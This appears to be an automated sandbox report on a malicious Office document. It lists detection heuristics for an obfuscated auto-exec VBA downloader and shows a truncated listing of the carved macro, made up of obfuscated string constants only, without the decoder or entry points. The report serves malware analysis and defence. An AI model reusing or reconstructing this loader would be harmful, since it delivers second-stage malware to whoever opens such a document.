MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The file contains a malicious VBA macro — an obfuscated auto-exec loader that uses the CreateObject and CallByName functions. The macro is designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Amphitryon-10013741-0'. The presence of auto-execution entry points such as Document_Open and Workbook_Open further supports this malicious intent.
Heuristics 10
-
ClamAV: Doc.Downloader.Amphitryon-10013741-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Amphitryon-10013741-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROS — Document contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER — Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPEN — Workbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call
-
CallByName call high OLE_VBA_CALLBYNAME — CallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRON — Environ() call (env variable access)
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three URLs below were reached only from the document body, none from the macro channel, which is consistent with the loader finding above: the macro keeps its URL indicators out of the visible source.
- http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7689 bytes |

SHA-256: f56610814d72a41c9be07029d8ffdee8b41686f4f93d82ba88cf1e56f0dc8e77
Preview script — first 1,000 lines of the extracted script (the listing below is truncated; the decoder routine and the auto-exec entry points are not shown in this excerpt)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' The Attribute lines above are VBA project metadata for the ThisDocument
' class module as surfaced by the olevba extraction; they are not executable.
'
' Obfuscated string constants. Every value is interleaved with the same small
' set of filler characters ( ) , * ), which matches the junk-token Replace-removal
' shape described by the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding in this
' report. The decoder that strips the filler, the auto-exec entry points
' (Document_Open / Workbook_Open) and the CreateObject / CallByName sinks the
' report names all lie outside this truncated preview. NOTE(review): none of
' these constants is a usable indicator on its own — confirm against the full
' decoded macros.bas before extracting any IoC from them.
Private Const KCRnrJ As String = ")qr)gnr(e,p( *f(n)j *gar(z)h,pb(,q f*vu)G"
Private Const yUvmTueYILGodWDsc As String = "e(ag,TyB*)SQrL,F(Oxs*b*m,iEXKPv(t,lw*I)H(nJU*q(Wjck,C(R(Zh)dYG*"
Private Const tiWvLefwgU As String = "hx)(pOF)ZtWvIG*VT,c(y,Q*qNMsA*Bum)K"
Private Const OKofaruUQVSC As String = "q)s*Qr()IRcX()T(yg)G(x*l"
Private Const EvnDwTkYsVgCOrmQXcG As String = "n,uY()JxE)TIfNbBjd*Zz(w,,Up*He*ArvP,q*,sl(F,W,S)i*CD(th)KLRyM,G)"
Private Const KOteyJZVWYCrIBU As String = "*Ocp,,n*ld)LaS)F(xe)k,*uJPiB*ZIX)*QEv)(z*Kgy("
Private Const CQmetzGKDqyLbEaIrH As String = "q(XDmign)hb,T(t,vFEc*LM)dZw(eOlYf*A(rW)U,S*Cs(K*R,a,pk*VN"
Private Const EPymQuhLUGTgfsDVXYO As String = "r)yv(s(bg(rinf"
Private Const jAYwUXWRznS As String = "qryon)a,r ro )g,fh,z ,fbepnZ("
Private Const XyVIFgfsGtehqSbn As String = "(wJKE*)Ty)c(*PsHqFC*rW**DY(Ie(Bm)N,Vf)dA*U(p,b"
Private Const QHhgUWTavVejrcm As String = "er*u*HpDT*wzEhgKBfFI**xs*vGi,kM"
Private Const fmEXDt As String = ")qa)rF,"
Private Const zBLQYAuGfkMXRSKwph As String = "C,ZR)G"
Private Const qlNFOdTomVHIt As String = "Q(q,yM(NgfRA,,x)aw)k(o(t,Xd*r)cupbThH*nD(jC*W,vYJ(l)B(sKeFVGI*SZ)z"
Private Const FqgDCx As String = "r)kr).r,u/(ftn(y*s/,,rt(nz*v/e)v(.vqnwz(n(ler,*yy)(nt//(:cgg,)u"
Private Const UkSiDxpABYoureRfzJE As String = "a)r)cB("
Private Const QMEFYnPRlteGhqb As String = ",E*vm)L,gTt*O()ksQoy"
Private Const YNFXgaWTAhxH As String = "0*(.6*.C((GG)UY(Z*Ke(rie,rF).2(yzkfZ"
Private Const kyVXsRPrKYWuo As String = "HnB*Oeo*ME(Pm)Wdg*f)GV*XrT(SU"
Private Const jDIfPlLYGRnUgdH As String = "WnF(OYh)g(BbEw,"
Private Const zeuYgqFEZ As String = ")yy)r)u(F.*g(cvep(F*J"
Private Const oTbSCOlGMxvAcsfkHK As String = "O,r,UZgqNCh)J*)FR,X"
Private Const NnPeajAtpZDhv As String = "VF*(DJu(v,Kax,fXq(R,*P*bzAZ((s(T(GCp,n*L()W,mY)itSNI)QByl*r"
Private Const yWeQUxkDPpO As String = "gih(aK)nq)PAOwQ,S,G)Mo)f,cC)(R)ms**uYXdVyxT"
Private Const urNDXze As String = "l,q*b(Or)*fa,bc)fre"
Private Const syDeEZlqIMxfNpJQ As String = "zX)AJ)(Uq(wL)Md(sWtpK(g,xrOYPn)FyDV)C(Buh,,TR(H)Nkb*v"
Private Const RXtYSWjdmUiyCQGNV As String = "pX(t,EK*OeqI*,Ji(Y,bHys*oPC)rB*T,SZch,dL*vVNzGg(kjM(af,F*RnQ)lDm(x"
Private Const shYCDifWtGBO As String = "C,(Kk(hTuH*ft(a*GnL*UVlIqPdSZRD*zBv*FJ(sr(MN"
Private Const ysBokm As String = "zn)r*eg,F.(o)q*bq,N"
Private Const nzRuZDwHMtlUKVO As String = "B,(EjsQH*z)quhf(b"
Private Const kncwxltzCRfUViGmXHWo As String = "eTp)sEoB,Igq*)f*GXmy,L*"
Private Const psNfYELOoUPwaDQxj As String = "Te*E)Dx(Jc(GzKaMV,NusP)O,HS(iYd(QBr*n)"
Private Const vYhlzHpTRys As String = "j(YFV)gE)JuA*e)bO*Nd)XK(m)i,DMR(n,v,Tfa)*xS(sh"
Private Const aUpFYueQBPEvXwzMK As String = "rg)v(ej*"
Private Const tgasvlhqmXNRof As String = "O)f(eq)G(wv(,HDr*go)j*dah*AuSc(R,tB)lQsK*zmT(ELPUi(pk,"
Private Const pJjABKHeNiu As String = ")VBW)CS,T)pKHNZxz*gQO)j*f*D"
Private Const PuLpwOlzJiHEsACtoRrx As String = "rkr.)57761299)81,7*1055.(0("
Private Const OfYazEBVTrZhqIRwucG As String = "YmVxF,rfns,k)b(Zu,XP(h,MR)NTyW*LKj)EC,G,eAU(QB)H"
Private Const awylvUCzSsbNYK As String = "Q)d)Ht(K,z)qOXw(*GYF("
Private Const oGtYDMZPOHfmsEJNejCw As String = "F,S*GL,)tExB(l,*rekf,Y*d"
Private Const sexhHvnwTCqY As String = "O**la,n(VMe(xvB,ES,oY,XI(PN*(p)j*mu(W)HT)D*"
Private Const UoxWjubwPc As String = "u(X()bECYUl)p,*PNZ*)a,IzV(D,,gy*Qo,sWGxvje"
Private Const uSHlpzVUhO As String = "bXUf*ntmY,C*l,*ku(*r)pL(*O)oTJV,W)FQAqwZeyHzj,N))adG,Sxi(s*E*IvhRK,D"
Private Const VmKjwUQscYpidyf As String = "o(c,gwbHN*vDqXGA*)BK(F,VSjyC,Ur)ze)(xi,(ZIsh,n*,OpmLl,T)P"
Private Const UPzLifXMVNphCeODAumo As String = ",s,bC,,GekyJ)Y(X*pldRVD,"
Private Const VpedlioYAWhKN As String = ",ar(c*B"
Private Const CXmOHcKdjqpIQatPT As String = "jt(CZF)iH*a(gK*IM*BSRJAUw*XL((WpP,yo*,l"
Private Const tXHKPTBpSvoLIDisd As String
... (truncated)